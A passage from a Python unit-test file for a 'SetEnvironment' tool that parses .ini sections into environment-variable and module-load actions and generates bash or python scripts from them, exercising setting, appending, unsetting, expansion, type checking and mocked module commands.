`actions`:\")\n print(\"Expected:\")\n pprint(actions_expected, width=90, indent=4)\n print(\"Actual\")\n pprint(parser.actions[section], width=90, indent=4)\n\n self.assertListEqual(actions_expected, parser.actions[section])\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_pretty_print_envvars(self):\n \"\"\"\n\n \"\"\"\n section = \"CONFIG_A\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n #parser.exception_control_level = 4\n print(\"\")\n envvar_include_filter = [\"SETENVIRONMENT_TEST_\"]\n\n os.environ[\"SETENVIRONMENT_TEST_ENVVAR_001\"] = \"foobar\"\n os.environ[\"SETENVIRONMENT_HIDDEN_ENVVAR_001\"] = \"baz\"\n\n with patch('sys.stdout', new=StringIO()) as m_stdout:\n parser.pretty_print_envvars(envvar_filter=envvar_include_filter)\n self.assertIn(\"SETENVIRONMENT_TEST_ENVVAR_001 = foobar\", m_stdout.getvalue())\n self.assertIn(\"SETENVIRONMENT_HIDDEN_ENVVAR_001\", m_stdout.getvalue())\n self.assertNotIn(\"SETENVIRONMENT_HIDDEN_ENVVAR_001 = baz\", m_stdout.getvalue())\n\n # Filtered + keys_only should print out only the one key\n with patch('sys.stdout', new=StringIO()) as m_stdout:\n parser.pretty_print_envvars(envvar_filter=envvar_include_filter, filtered_keys_only=True)\n self.assertIn(\"SETENVIRONMENT_TEST_ENVVAR_001 = foobar\", m_stdout.getvalue())\n self.assertNotIn(\"SETENVIRONMENT_HIDDEN\", m_stdout.getvalue())\n\n # No options should print all envvars + values\n with patch('sys.stdout', new=StringIO()) as m_stdout:\n parser.pretty_print_envvars()\n self.assertIn(\"SETENVIRONMENT_TEST\", m_stdout.getvalue())\n self.assertIn(\"SETENVIRONMENT_HIDDEN\", m_stdout.getvalue())\n\n # No filter but we say show filtered keys only should result in\n # print all keys + values.\n with patch('sys.stdout', new=StringIO()) as m_stdout:\n parser.pretty_print_envvars(filtered_keys_only=True)\n self.assertIn(\"SETENVIRONMENT_TEST\", m_stdout.getvalue())\n self.assertIn(\"SETENVIRONMENT_HIDDEN\", m_stdout.getvalue())\n\n # cleanup\n del os.environ[\"SETENVIRONMENT_TEST_ENVVAR_001\"]\n del os.environ[\"SETENVIRONMENT_HIDDEN_ENVVAR_001\"]\n\n return\n\n def test_SetEnvironment_method_apply_section_badtype(self):\n \"\"\"\n Give a bad type for ``section`` in ``apply(section)``.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = None\n print(\"Section : {}\".format(section))\n\n with self.assertRaises(TypeError):\n parser.apply(section)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_test_01(self):\n \"\"\"\n \"\"\"\n section = \"CONFIG_A\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n parser.apply(section)\n\n self.assertTrue(\"BAR\" in os.environ.keys())\n self.assertEqual(\"foo\", os.environ[\"BAR\"])\n\n parser.pretty_print_envvars([\"BAR\"], True)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_test_02(self):\n \"\"\"\n \"\"\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n section = \"ENVVAR_UNSET_TEST\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n parser.apply(section)\n\n self.assertFalse(\"FOO\" in os.environ.keys())\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n @patch('subprocess.run', side_effect=mock_run_status_ok)\n def test_SetEnvironment_method_apply_module_test(self, arg_run):\n \"\"\"\n \"\"\"\n section = \"CONFIG_B\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n parser.apply(section)\n\n envvar_truth = [(\"TEST_SETENVIRONMENT_GCC_VER\", \"7.3.0\")]\n for ienvvar_name, ienvvar_val in envvar_truth:\n self.assertTrue(ienvvar_name in os.environ.keys())\n self.assertEqual(ienvvar_val, os.environ[ienvvar_name])\n\n print(\"\")\n envvar_filter = [\"TEST_SETENVIRONMENT_\"]\n parser.pretty_print_envvars(envvar_filter, True)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_module_use_badpath(self):\n \"\"\"\n Test that a `module use ` will trigger an\n appropriate exception.\n \"\"\"\n section = \"MODULE_USE_BADPATH\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n # - the missing file will generate a RuntimeError, but the message\n # that will get generated down in the ``exception_control_event``\n # should have the details.\n with self.assertRaises(RuntimeError):\n parser.apply(section)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_module_load_noexist(self):\n \"\"\"\n Test that we correctly deal with module loads that fail\n because the module didn't exist.\n\n This might not really easily be testable because applications\n like ``modulecmd`` and ``lmod`` tend to \"fail gracefully\" without\n returning a nonzero status code.\n\n This kind of stuff is why we might want to roll our own wrapper\n to those commands someday that is better than what we currently\n have in ModuleHelper.\n \"\"\"\n section = \"MODULE_LOAD_NOEXIST\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions but use our popen mock routine that emulates\n # a bad output.\n with self.assertRaises(RuntimeError):\n\n # Patch in our version of Popen which will emulate what a 'module load'\n # of a missing module will return. This is for consistency because it\n # seems modulecmd does slightly different things across different\n # platforms.\n # This should ensure that we take the 'right' path in ModuleHelper.module\n # that we want to test here and trigger the RuntimeError.\n with patch('subprocess.run', side_effect=mock_run_status_ok):\n with patch('subprocess.Popen', side_effect=mock_popen_status_error_rc0):\n parser.apply(section)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_expansion(self):\n \"\"\"\n Tests that an envvar expansion will properly be executed\n during ``apply()``. Uses the following ``.ini`` file section:\n\n [ENVVAR_VAR_EXPANSION]\n envvar_set ENVVAR_PARAM_01 : \"AAA\"\n envvar_set ENVVAR_PARAM_02 : \"B${ENVVAR_PARAM_01}B\"\n envvar_set ENVVAR_PARAM_03 : ${ENVVAR_PARAM_01} -- ${ENVVAR_PARAM_02} -- ${ADFASF}\n\n The expected result should be:\n - ``ENVVAR_PARAM_01`` = \"AAA\"\n - ``ENVVAR_PARAM_02`` = \"BAAAB\"\n - ``ENVVAR_PARAM_03`` = \"AAA -- BAAAB -- ${ADFASF}\"\n\n \"\"\"\n section = \"ENVVAR_VAR_EXPANSION\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n parser.apply(section)\n\n envvar_truth = [\n (\"ENVVAR_PARAM_01\", \"AAA\"), (\"ENVVAR_PARAM_02\", \"BAAAB\"),\n (\"ENVVAR_PARAM_03\", \"AAA -- BAAAB -- ${ADFASF}\")\n ]\n for ienvvar_name, ienvvar_val in envvar_truth:\n self.assertTrue(ienvvar_name in os.environ.keys())\n self.assertEqual(ienvvar_val, os.environ[ienvvar_name])\n\n print(\"\")\n envvar_filter = [\"ENVVAR_PARAM_\"]\n parser.pretty_print_envvars(envvar_filter, True)\n\n del os.environ['ENVVAR_PARAM_01']\n del os.environ['ENVVAR_PARAM_02']\n del os.environ['ENVVAR_PARAM_03']\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_parameter_check(self):\n \"\"\"\n Test the ``_apply_envvar()`` method's type checking of parameters.\n \"\"\"\n section = \"ENVVAR_VAR_EXPANSION\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # Test #1 : TypeError should be raised if operation is not a str type.\n operation = None\n envvar_name = \"FOO\"\n envvar_value = \"BAR\"\n with self.assertRaises(TypeError):\n parser._apply_envvar(operation, envvar_name, envvar_value)\n\n # Test #2 : TypeError should be raised if envvar_name is not a str type.\n operation = \"envvar_set\"\n envvar_name = None\n envvar_value = \"BAR\"\n with self.assertRaises(TypeError):\n parser._apply_envvar(operation, envvar_name, envvar_value)\n\n # Test #3 : TypeError should be raised if envvar_value is not a str or None type.\n operation = \"envvar_set\"\n envvar_name = \"FOO\"\n envvar_value = 12345\n with self.assertRaises(TypeError):\n parser._apply_envvar(operation, envvar_name, envvar_value)\n\n # Test #4 : A ValueError will be raised if an unknown operation is given.\n operation = \"envvar_unknown\"\n envvar_name = \"FOO\"\n envvar_value = \"BAR\"\n with self.assertRaises(ValueError):\n parser._apply_envvar(operation, envvar_name, envvar_value)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_module_parameter_check(self):\n \"\"\"\n Test the ``_apply_module()`` method's type checking of parameters.\n \"\"\"\n section = \"MODULE_LOAD_OK\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n # Test #1 : TypeError should be raised if operation is not a str type.\n operation = None\n module_name = \"gcc\"\n module_value = \"7.3.0\"\n with self.assertRaises(TypeError):\n with patch('subprocess.Popen', side_effect=mock_popen_status_ok):\n parser._apply_module(operation, module_name, module_value)\n\n # Test #2 : TypeError should be raised if envvar_name is not a str or None type.\n operation = \"module_load\"\n module_name = 12345\n module_value = \"7.3.0\"\n with self.assertRaises(TypeError):\n with patch('subprocess.Popen', side_effect=mock_popen_status_ok):\n parser._apply_module(operation, module_name, module_value)\n\n # Test #3 : TypeError should be raised if envvar_value is not a str or None type.\n operation = \"module_load\"\n module_name = \"gcc\"\n module_value = 12345\n with self.assertRaises(TypeError):\n with patch('subprocess.Popen', side_effect=mock_popen_status_ok):\n parser._apply_module(operation, module_name, module_value)\n\n # Test #4 : ValueError is raised if an unknown module operation is provided.\n operation = \"module_undefined\"\n module_name = \"gcc\"\n module_value = \"7.3.0\"\n with self.assertRaises(ValueError):\n with patch('subprocess.Popen', side_effect=mock_popen_status_ok):\n parser._apply_module(operation, module_name, module_value)\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_apply_envvar_expansion_missing(self):\n \"\"\"\n Tests that an envvar expansion will properly handle a missing envvar\n during expansion. The following .ini section is used to test this:\n\n [ENVVAR_VAR_EXPANSION_BAD]\n envvar_set ENVVAR_PARAM_01 : \"B${ENVVAR_PARAM_MISSING}B\"\n\n This should cause a ``KeyError`` to be raised during ``apply()``\n\n Todo:\n Is this test still valid if we won't raise a KeyError\n if an envvar is missing inside the string during 'apply'\n since ``os.path.expandvars()`` won't throw if the envvar\n isn't around.\n \"\"\"\n section = \"ENVVAR_VAR_EXPANSION_BAD\" # envvars\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions\n print(\"\")\n parser.pretty_print_actions(section)\n\n # Apply the actions\n #with self.assertRaises(KeyError):\n # parser.apply(section)\n # !!! Note: the envvar in string is now being processed via ``os.path.expandvars()``\n # which does not raise a KeyError if it finds an envvar-like thing. Instead,\n # it'll just keep the \"${stuff}\" string intact if it finds no envvar.\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_generate_actions_script(self):\n \"\"\"Test generate_actions_script()\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = \"CONFIG_A+\"\n print(\"Section : {}\".format(section))\n rval_actual = parser.generate_actions_script(section)\n self.assertIn('envvar_op set \"FOO\" \"bar\"', rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = None\n print(\"Section : {}\".format(section))\n with self.assertRaises(TypeError):\n rval_actual = parser.generate_actions_script(section)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_parse_section_generic_options_missing(self):\n \"\"\"\n A basic test that checks parsing via the ``configparserenhanceddata``\n object. If we parse via that then we probably *should* get an actions\n list constructed since it also calls the ``parse_section()`` method\n under the hood.\n \"\"\"\n section = \"CONFIG_A\"\n\n actions_expect = [\n {\n 'op': 'envvar_set', 'envvar': 'FOO', 'value': 'bar'\n }, {\n 'op': 'envvar_append', 'envvar': 'FOO', 'value': 'baz'\n }, {\n 'op': 'envvar_prepend', 'envvar': 'FOO', 'value': 'foo'\n }, {\n 'op': 'envvar_set', 'envvar': 'BAR', 'value': 'foo'\n }, {\n 'op': 'envvar_remove_substr', 'envvar': 'FOO', 'value': 'bar'\n }, {\n 'op': 'envvar_unset', 'envvar': 'FOO', 'value': None\n }\n ]\n\n rval_expect_cped = {}\n\n self._helper_parse_section(section, actions_expect, rval_expect_cped)\n\n return\n\n def test_SetEnvironment_parse_section_generic_options_exist(self):\n \"\"\"\n Testing the use of parsing a section with operations and generic options\n \"\"\"\n section = \"CONFIG_ENVVAR_WITH_GENERIC_OPTION\"\n\n actions_expect = [\n {\n 'op': 'envvar_set', 'envvar': 'FOO', 'value': 'bar'\n }, {\n 'op': 'envvar_append', 'envvar': 'FOO', 'value': 'baz'\n }, {\n 'op': 'envvar_prepend', 'envvar': 'FOO', 'value': 'foo'\n }\n ]\n\n rval_expect_cped = {'key1': 'value1'}\n\n self._helper_parse_section(section, actions_expect, rval_expect_cped)\n\n return\n\n def test_SetEnvironment_helper_apply_envvar_failure(self):\n \"\"\"\n Simulate a failure to set an envvar.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n section = \"CONFIG_A\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n # Override the _exec_helper call to force a rvalue of 1. This should\n # trigger the `if output != 0` check at the end of `_apply_envvar`\n\n # In this case, the RuntimeError exception will be thrown.\n parser.exception_control_level = 5\n with patch.object(SetEnvironment, '_exec_helper', mock_function_return_1):\n with self.assertRaises(RuntimeError):\n rval = parser._apply_envvar(\"envvar_set\", \"FOO\", \"BAR\")\n self.assertEqual(1, rval)\n\n # In this case, `exception_control_level` is set to 0 so the RuntimeError\n # isn't raised but the command should still return a nonzero value.\n parser.exception_control_level = 0\n with patch.object(SetEnvironment, '_exec_helper', mock_function_return_1):\n rval = parser._apply_envvar(\"envvar_set\", \"FOO\", \"BAR\")\n self.assertNotEqual(0, rval)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actions_script_nohdr(self):\n \"\"\"\n Test `_gen_actions_script` without a header\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.exception_control_level = 5\n parser.debug_level = 5\n\n section = \"CONFIG_A\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n test_incl_hdr = False\n test_interp = \"bash\"\n rval_expect = dedent(\n \"\"\"\\\n # -------------------------------------------------\n # S E T E N V I R O N M E N T C O M M A N D S\n # -------------------------------------------------\n envvar_op set \"FOO\" \"bar\"\n envvar_op append \"FOO\" \"baz\"\n envvar_op prepend \"FOO\" \"foo\"\n envvar_op set \"BAR\" \"foo\"\n envvar_op remove_substr \"FOO\" \"bar\"\n envvar_op unset \"FOO\"\n \"\"\"\n ).strip()\n rval_actual = parser.generate_actions_script(\n section, incl_hdr=test_incl_hdr, incl_shebang=False, interp=test_interp\n )\n rval_actual = rval_actual.strip()\n\n self.assertEqual(rval_expect, rval_actual)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actions_script_badinterp(self):\n \"\"\"\n Test `_gen_actions_script` with a bad interpreter\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.exception_control_level = 5\n parser.debug_level = 5\n\n section = \"CONFIG_A\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n # This should throw a ValueError because the `exception_control_event`\n # that gets raised is a `SERIOUS` one which causes a throw if\n # `exception_control_level` is >= 3.\n test_incl_hdr = True\n test_interp = \"invalid_interpreter\"\n with self.assertRaises(ValueError):\n parser.generate_actions_script(section, incl_hdr=test_incl_hdr, interp=test_interp)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n # Test what happens if ECL is low enough to cause the SERIOUS event to\n # _not_ raise the ValueError but instead print out a big warning.\n # Setting `exception_control_level` to 2 will cause only CRITICAL events\n # to raise the exception.\n parser.exception_control_level = 2\n test_incl_hdr = True\n test_interp = \"invalid_interpreter\"\n rval_expect = \"\"\n rval_actual = parser.generate_actions_script(section, incl_hdr=test_incl_hdr, interp=test_interp)\n self.assertEqual(rval_expect, rval_actual)\n parser.exception_control_level = 5\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n # Test what happens when there's an action entry that is missing either\n # `envvar` or `module` in its key(). This should throw a ValueError.\n test_incl_hdr = True\n test_interp = \"bash\"\n\n # add a bogus action that is missing either 'envvar' or 'module' from its\n # keys.\n parser.actions[section].append({'op': 'envvar_set', 'value': \"thevalue\", \"newkey\": \"???\"})\n\n with self.assertRaises(ValueError):\n parser.generate_actions_script(section, incl_hdr=test_incl_hdr, interp=test_interp)\n\n # Cleanup: Remove the bogus entry from the actions.\n del parser.actions[section][-1]\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actioncmd_module_badinterp(self):\n \"\"\"\n Test the ``_gen_actioncmd_module`` command.\n\n Test that an exception is raised if ``interp`` is sent a bad\n parameter for the interpreter.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n operation = \"module_load\"\n module_name = \"gcc\"\n module_ver = \"7.2.0\"\n interpreter = \"bad interpreter name\"\n with self.assertRaises(ValueError):\n parser._gen_actioncmd_module(operation, module_name, module_ver, interp=interpreter)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actioncmd_envvar_badinterp(self):\n \"\"\"\n Test the ``_gen_actioncmd_envvar`` command\n\n Test that an exception is raised if ``interp`` is sent a bad\n parameter for the interpreter.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n operation = \"envvar_set\"\n envvar_name = \"FOO\"\n envvar_val = \"BAR\"\n interpreter = \"bad interpreter name\"\n with self.assertRaises(ValueError):\n parser._gen_actioncmd_envvar(operation, envvar_name, envvar_val, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actioncmd_envvar_badnumargs(self):\n \"\"\"\n Test the ``_gen_actioncmd_envvar`` command\n\n Test what happens if the wrong # of parameters is sent in for commands.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n envvar_name = \"FOO\"\n envvar_val = \"BAR\"\n interpreter = \"python\"\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # envvar_set requires 2 parameters.\n operation = \"envvar_set\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_envvar(operation, envvar_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # envvar_append requires 2 parameters.\n operation = \"envvar_append\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_envvar(operation, envvar_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # envvar_prepend requires 2 parameters.\n operation = \"envvar_prepend\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_envvar(operation, envvar_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # envvar_unset requires 1 parameters.\n operation = \"envvar_unset\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_envvar(operation, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_gen_actioncmd_module_badnumargs(self):\n \"\"\"\n Test the ``_gen_actioncmd_module`` command\n\n Test what happens if the wrong # of parameters is sent in for commands.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n module_name = \"gcc\"\n module_val = \"7.3.0\"\n interpreter = \"python\"\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_load requires 2 parameters.\n operation = \"module_load\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_module(operation, module_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_unload requires 1 parameters.\n operation = \"module_unload\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_module(operation, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_use requires 1 parameters\n operation = \"module_use\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_module(operation, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_swap requires 2 parameters\n operation = \"module_swap\"\n with self.assertRaises(IndexError):\n parser._gen_actioncmd_module(operation, module_name, interp=interpreter)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # module_purge requires 0 parameters\n operation = \"module_purge\"\n cmd_expect = 'ModuleHelper.module(\"purge\")'\n cmd_actual = parser._gen_actioncmd_module(operation, interp=interpreter)\n self.assertEqual(cmd_expect, cmd_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_remove_prefix(self):\n \"\"\"\n Test the ``_remove_prefix`` method.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n text = \"envvar_use\"\n prefix = \"envvar_\"\n rval_expect = \"use\"\n rval_actual = parser._remove_prefix(text, prefix)\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n text = \"envvar_use\"\n prefix = \"varuse\"\n rval_expect = \"envvar_use\"\n rval_actual = parser._remove_prefix(text, prefix)\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n text = None\n prefix = \"envvar_\"\n rval_expect = \"envvar_use\"\n with self.assertRaises(TypeError):\n rval_actual = parser._remove_prefix(text, prefix)\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n text = \"envvar_use\"\n prefix = None\n rval_expect = \"envvar_use\"\n with self.assertRaises(TypeError):\n rval_actual = parser._remove_prefix(text, prefix)\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_set_if_empty_01(self):\n \"\"\"\n Test the ``envvar_set_if_empty`` handler.\n \"\"\"\n # Toggle generate-new-ground-truth-files mode. This should never be left True when checked in.\n gen_new_ground_truth = global_gen_new_ground_truth_files\n # ATTN: LEAVING THIS ENABLED SHOULD FAIL THIS TEST AFTER FILE GENERATION\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 5\n parser.exception_control_compact_warnings = True\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n section = \"ENVVAR_SET_IF_EMPTY_01\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n parser.apply(section)\n parser.pretty_print_envvars(envvar_filter=[\"FOO_\", \"BAR_\", \"BAZ_\", \"BIF_\"], filtered_keys_only=True)\n\n envvar_foo_expect = \"FOO_VAL\"\n envvar_foo_actual = os.environ[\"FOO_VAR\"]\n self.assertEqual(envvar_foo_expect, envvar_foo_actual)\n\n envvar_bar_expect = \"BAR_VAL\"\n envvar_bar_actual = os.environ[\"BAR_VAR\"]\n self.assertEqual(envvar_bar_expect, envvar_bar_actual)\n\n envvar_baz_expect = \"BAZ_VAL\"\n envvar_baz_actual = os.environ[\"BAZ_VAR\"]\n self.assertEqual(envvar_baz_expect, envvar_baz_actual)\n\n envvar_bif_expect = \"\"\n envvar_bif_actual = os.environ[\"BIF_VAR\"]\n self.assertEqual(envvar_bif_expect, envvar_bif_actual)\n\n options = {\n \"prefix\": \"sie\",\n \"section\": section,\n \"header\": True,\n \"body\": True,\n \"shebang\": True,\n \"interpreter\": \"bash\"\n }\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n\n options[\"interpreter\"] = \"python\"\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n self.assertFalse(gen_new_ground_truth, \"Testing should not also generate new ground truth.\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_helper_envvar_set_if_empty_01(self):\n \"\"\"\n Test the envvar_set_if_empty HELPER\n \"\"\"\n print(\"\\n\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Verify type-checking in envvar_set_if_empty\")\n\n with self.assertRaises(TypeError):\n envvar_set_if_empty(None, \"FOO\", allow_empty=True)\n with self.assertRaises(TypeError):\n envvar_set_if_empty(\"FOO\", None, allow_empty=True)\n with self.assertRaises(TypeError):\n envvar_set_if_empty(\"FOO\", \"FOO\", allow_empty=None)\n with self.assertRaises(ValueError):\n envvar_set_if_empty(\"FOO\", \"\", allow_empty=False)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return 0\n\n def test_SetEnvironment_helper_envvar_op_01(self):\n \"\"\"\n Test the envvar_op HELPER\n \"\"\"\n print(\"\\n\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Verify type-checking in envvar_set_if_empty\")\n\n with self.assertRaises(TypeError):\n envvar_op(\"set_if_empty\", None, \"FOO\", allow_empty=True)\n with self.assertRaises(TypeError):\n envvar_op(\"set_if_empty\", \"FOO\", None, allow_empty=True)\n with self.assertRaises(TypeError):\n envvar_op(\"set_if_empty\", \"FOO\", \"FOO\", allow_empty=None)\n with self.assertRaises(ValueError):\n envvar_op(\"set_if_empty\", \"FOO\", \"\", allow_empty=False)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n 